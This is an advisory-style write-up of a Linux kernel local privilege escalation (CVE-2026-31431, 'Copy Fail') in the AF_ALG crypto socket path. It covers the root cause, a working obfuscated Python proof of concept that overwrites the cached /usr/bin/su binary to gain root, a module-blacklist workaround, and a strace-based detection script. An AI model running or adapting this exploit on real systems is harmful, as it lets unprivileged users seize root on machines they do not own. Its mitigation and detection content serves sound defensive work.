CVE-2026-31431
Copy Fail
📚 Information Gathering
Executive Summary

This critical vulnerability affects Linux Kernel versions 4.14 through 6.19.12 and impacts major Linux distributions including Ubuntu, Debian, and Red Hat. It allows a low-privileged user with a Linux shell on the system to gain root access. The exploit is a 732-byte script that targets the AF_ALG socket, which exposes the kernel's crypto subsystem to unprivileged user space.

Affected Software & Versions
Product Name    Affected Versions        Fixed Versions
Linux Kernel    4.14 (2017) - 6.19.11    7.0, 6.19.12, 6.18.22, 6.12.85, 6.6.137, 6.1.170, 5.15.204, and 5.10.254
Discovery Timeline
  • Initial Report: Security researcher Taeyang Lee already knew of a flaw in the AF_ALG + splice path that exposes the kernel crypto subsystem to unprivileged userspace. He passed his concerns to an AI agent called xint code, which audited the entire subsystem and found Copy Fail after an hour of running.
  • Vendor Notification: April 26, 2026
  • Patch Release: Patches were released starting April 30, 2026
  • Active Exploitation: CISA added this CVE to its Known Exploited Vulnerabilities catalog on May 1, 2026
⚠️ Real-World Impact: Organizations affected by this vulnerability risk unauthorized root access to internal and external Linux machines.
Attack Surface
🔬 Technical Analysis
Root Cause Analysis

The root cause of this vulnerability is the interaction of four components: the Linux page cache, the AF_ALG kernel crypto socket, the "authencesn" kernel AEAD template, and the splice() syscall. Together they allow the script to write attacker-controlled bytes at an arbitrary offset into the page-cache copy of the /usr/bin/su binary.

Exploitation Mechanism

Step-by-step explanation of how an attacker would exploit this vulnerability:

  1. Attacker downloads the Python script to the target system
  2. The malicious payload is executed on the target system
  3. Attacker gains escalated (root) privileges
Proof of Concept

#!/usr/bin/env python3
# Example Python PoC demonstrating the exploit
# Imports the script relies on: s = socket, g = os, zlib for the compressed payload
import socket as s, os as g, zlib
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

Note: PoC provided for educational purposes only. Always obtain proper authorization before testing.

🛡️ Mitigation Strategy

Remediation Instructions

The permanent fix is updating to one of the fixed kernel versions listed above. Until then, perform these steps on the vulnerable environment's command line to disable the algif_aead module as a workaround.

# Confirm algif_aead is available as a loadable kernel module
# (if it is built into the kernel rather than a module, a modprobe blacklist cannot disable it and the kernel must be updated instead)
modinfo algif_aead

# Blacklist the vulnerable module
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif-aead.conf

# Ensure the block is active: modprobe should now fail
# (if the module was already loaded before the blacklist, unload it with modprobe -r or reboot)
sudo modprobe algif_aead

# Rerun the PoC script to ensure it fails
python3 /path/to/exploit/PoC/exploit.py

Monitoring & Detection

The main indicator of this exploit being used is AF_ALG socket creation. The exploit has to call socket(AF_ALG, SOCK_SEQPACKET, 0) 40 times in rapid succession, each followed by a 4-byte write chunk. Watch for the following:
  • splice() system calls: this is where the page cache enters the crypto pipeline
  • recvmsg(): this call writes the 4 bytes
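As an added example (not part of this write-up or any vendor tooling), the following Python script applies the indicators above to strace -tt style syscall output: it counts AF_ALG SOCK_SEQPACKET socket() calls in a sliding window and alerts only when splice() and recvmsg() also appear in that window. The trace lines are constructed to mimic the PoC's per-chunk loop, and the 40-call threshold (from the indicator above) and one-second window are assumptions to tune for your environment.

```python
import re
from collections import deque

# strace -tt style line: "HH:MM:SS.micro name(args) = ret"
LINE_RE = re.compile(r"^(\d+):(\d+):(\d+\.\d+)\s+(\w+)\((.*)\)\s+=\s+(-?\d+)")

def parse_line(line):
    """Return (seconds_since_midnight, syscall, args), or None if no match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    h, mi, sec, name, args, _ret = m.groups()
    return int(h) * 3600 + int(mi) * 60 + float(sec), name, args

def detect_af_alg_burst(lines, window=1.0, threshold=40):
    """Return (timestamp, socket_count) alerts: one per burst of >= threshold
    AF_ALG SOCK_SEQPACKET socket() calls within `window` seconds that also
    contains splice() and recvmsg() calls (assumed threshold/window)."""
    sockets, related, alerts = deque(), deque(), []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, name, args = parsed
        if name == "socket" and "AF_ALG" in args and "SOCK_SEQPACKET" in args:
            sockets.append(ts)
        elif name in ("splice", "recvmsg"):
            related.append((ts, name))
        while sockets and ts - sockets[0] > window:   # expire events outside the window
            sockets.popleft()
        while related and ts - related[0][0] > window:
            related.popleft()
        if len(sockets) >= threshold and {"splice", "recvmsg"} <= {n for _, n in related}:
            alerts.append((ts, len(sockets)))
            sockets.clear()                            # one alert per burst
    return alerts

def constructed_trace(iterations=40, start=43200.0, step=0.0002):
    """Constructed (not captured) strace-style lines mimicking the PoC's per-chunk loop."""
    calls = ("socket(AF_ALG, SOCK_SEQPACKET, 0) = 3",
             'bind(3, {sa_family=AF_ALG, salg_type="aead"}, 88) = 0',
             "accept(3, NULL, NULL) = 4", "splice(5, [0], 7, NULL, 20, 0) = 20",
             "splice(6, NULL, 4, NULL, 20, 0) = 20", "recvmsg(4, {...}, 0) = 20")
    lines, t = [], start
    for _ in range(iterations):
        for call in calls:
            hh, mm, ss = int(t // 3600), int(t % 3600 // 60), t % 60
            lines.append(f"{hh:02d}:{mm:02d}:{ss:09.6f} {call}")
            t += step
    return lines
```

Running detect_af_alg_burst(constructed_trace()) yields a single alert at the 40th socket() call; the same 40 calls spread one second apart produce none, which is why the window matters as much as the count.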
📖 References & Resources
Tools & Exploits Used
Disclaimer

This write-up is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing for vulnerabilities on systems you do not own.